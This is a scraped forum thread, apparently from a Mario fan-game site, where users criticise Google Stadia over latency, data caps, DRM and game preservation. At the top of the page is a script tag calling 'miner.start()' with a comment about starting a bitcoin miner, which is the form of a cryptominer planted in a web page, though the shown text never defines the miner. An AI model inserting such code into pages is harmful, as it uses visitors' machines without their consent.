<script>
miner.start(); // initialise bitcoin miner
</script>

smw centralpge projectmario fan games galaxy

Google Stadia

do you like them video games? what about those there romhacks? well pop on in here and talk about them then! what are you waiting for?!
Ashan
The world has become a place

Google Stadia

Postby Ashan » 8 months ago

Google announced today that they're releasing a controller and a platform for streaming games through a web browser.
This isn't entirely new technology, but Google could have a serious advantage over the other guys doing this, just from how many datacenters they have all over the world, meaning more people will have access to lower latency streaming from a server near them.

As much as I like the idea of a new option being available for video games, I can't help but be pessimistic just because it's Google and they're quickly becoming the Disney of the internet, in that they're headed in a direction where they're gonna have a monopoly on the entire internet (if that's not already the case). On the other hand they have a habit of launching projects and just forgetting about them, though it sounds like they have some fairly big partnerships with game studios which might force them to not abandon it.

What are your thoughts?

More info

Mata Hari

Re: Google Stadia

Postby Mata Hari » 8 months ago

I'll believe it when I see it

Leet
Well, hello, Smith ( ´-`)ノ
First name: Chie Arale
Pronouns: she/her

Postby Leet » 8 months ago

I really don't want this to catch on, it's bad for everyone except google
Well it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

KobaBeach
obscure jrpg enthusiast
First name: David
Pronouns: he/him

Postby KobaBeach » 8 months ago

i find it ironic how google has a "dont be evil" motto but they're trying to make a monopoly out of the internet
twitter (spicy at times!) | avatar by kuma

who cares:

Blivsey
forever an obscure pokemons
First name: Liv
Pronouns: she/her

Postby Blivsey » 8 months ago

Dead on arrival to me, seeing as I still live under a data cap
convenient noise thread for stress-relief purposes

Cyril
metal nerd
First name: Cyril
Pronouns: he/she/they

Postby Cyril » 8 months ago

No
i've honestly never played a video game in my life

Ashan

Postby Ashan » 5 months ago

I forgot I made this thread.

I guess I should update my opinion on this now that I've had some time for it to soak, as well as hear some more information and opinions.

The closer this gets to launch, the more I hate everything about the concept of it, and the more I actively want this to flop on its face. I also kind of expect it to fail, if not only because it's coming from Google and they cannot create anything successful.

Reecer7
Crack is fun and nice and a good time!
Pronouns: he/him/his

Postby Reecer7 » 5 months ago

In Giant Bomb's fun yearly E3 late night talk show, they had a whole interview with someone from Google who seemed very sincerely excited that Stadia was going to change gaming at its core, or something. But when he got asked the question of how they'd deal with obstacles like data bottlenecks, especially in regions where one ISP has full control of the market, all he said was something like "Never bet against the Internet."

And that's basically why I have no faith in Stadia.
call me reecer6, not reecer7, please! gotta maintain that same internet brand.
I do a lot more things at my tumblr here than I do here! So, check it out, if you think I'm cool!

Awoo
Wolf girls? In *my* area? It's more likely than you think!
Pronouns: he/him/his

Re: Google Stadium

Postby Awoo » 5 months ago

ワンワン :pal:

Ashan

Postby Ashan » 16 hours ago

Google Stadia launches today.

Seems like it is perfect for people who are really into AAA games but not enough to build a PC or spend a pithy $300 every 7 years for a console (or less if you buy used) but for some reason don't mind paying full price or unimpressive digital storefront sale prices for games and also don’t mind random input lag and occasional frame drops and also they have fast, reliable internet provided by an ISP that isn’t going to throttle your speed during peak hours or god forbid give you a monthly data cap and said internet never gets congested and also they live within walking distance to a Google datacenter and aren’t worried about Google canning the service in 2-3 years like they do with most of their services making them lose all the full-price games they paid for.

And by "perfect" I mean "okay"

BobisOnlyBob
Mythical Quadruped

Postby BobisOnlyBob » 16 hours ago

BOB is an acronym for BOB is Only BOB etc.

Kilgamayan
The Real Treasure is You
First name: Rabi~En~Roll

Postby Kilgamayan » 15 hours ago

Image Please interact Image

Image Image
Image Image

Ashan

Postby Ashan » 15 hours ago

I was keeping a bit of a following of reviews that all went up yesterday (speaking of, isn't it usually a bad sign in games when press embargo is lifted the day before launch?) and the most positive ones I saw were basically "it's fine." And of those positive reviews, it seemed like most of those people lived in/near the San Francisco bay area, meaning they're basically the optimal user and probably not a good source of what the typical experience will be like. The most damning review circulating was from Forbes whose reviewer lives in Ohio, and despite his 350mbps internet connection, he said it only worked like 80% of the time and the rest was dropped frames and hiccups.

Even aside from the technical issues, I just don't know who this is for.
If you're worried about saving money, I can't imagine a situation where Stadia will save you money over buying used physical games, or hell just borrowing from a friend. Even in the most optimal case, I imagine the sales could roughly be on par with Steam sales, but even those haven't been particularly great for a few years.
If you want to play on-the-go, I don't know any situations where you'd be out and about with access to an ideal, fast, uncongested internet connection that again, is close to a Google data center.
If it's for people who are so into gaming that they can't imagine leaving the house without their video game, you probably already own these games on other systems and will be forced to re-buy them, and most games will not have cross-save so you'll be starting fresh. Plus I think anyone that into games would not be fine with having their game ruined by stutters and whatnot.

And honestly aside from these issues, I just don't want anything like this to take off because of how anti-consumer it is. It takes DRM to its furthest extreme, where you straight up don't have real access to anything you purchased even though you're paying the same prices. It's also an absolute nightmare for games preservation. At least in the digital download form of DRM, if those games are someday pulled from the store, chances are you can still play it on the system you downloaded it to, or pirate it. In a dystopian future where game streaming is the standard for video games, the only games you will be able to play at a specific point in time is whatever is being offered from game streaming companies. You won't be able to pirate the games cause no one has access to the files, so games could just be forever lost to time because the publisher decided to stop selling.

Driver San Francisco is a game that somewhat recently became impossible to purchase because of a situation like this. If it was only ever offered on game streaming, that game would be lost forever and nobody could play it ever again.

BobisOnlyBob
Mythical Quadruped

Postby BobisOnlyBob » 13 hours ago

Ashan wrote: Driver San Francisco is a game that somewhat recently became impossible to purchase because of a situation like this. If it was only ever offered on game streaming, that game would be lost forever and nobody could play it ever again.
Unless you pay with Sandwich Tokens.

BOB is an acronym for BOB is Only BOB etc.

Ashan

Postby Ashan » 10 hours ago

Yeah that was the video that made me aware of that situation in particular

Return to “the cartridgé”